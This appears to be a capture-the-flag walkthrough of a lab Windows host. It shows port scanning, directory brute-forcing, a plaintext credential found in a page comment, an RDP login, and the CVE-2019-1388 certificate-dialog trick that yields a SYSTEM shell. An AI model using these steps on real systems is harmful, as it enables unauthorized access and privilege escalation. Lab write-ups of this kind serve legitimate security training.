# ── Recon (no ICMP!) ─────────────────────────
└─# nmap -p 80,3389 -Pn -sV 10.10.X.X
80/tcp open http Microsoft IIS 10.0
3389/tcp open rdp Microsoft Terminal Services
# ── Gobuster → /retro/ ───────────────────────
└─# gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/retro (Status: 301)
# ── Found creds in comment ───────────────────
Wade: "parzival" (left in comment as reminder!)
# ── RDP Login ────────────────────────────────
└─# xfreerdp /u:wade /p:parzival /cert:ignore /v:10.10.X.X
[INFO] Connected · Welcome Wade! Check Recycle Bin
# ── CVE-2019-1388 ────────────────────────────
1. hhupd.exe → Run as Administrator
2. "Show more details" → "VeriSign Commercial..." link
3. IE opens as SYSTEM → CTRL+S → type cmd.exe → ENTER
C:\Windows\system32> whoami
nt authority\system
└─#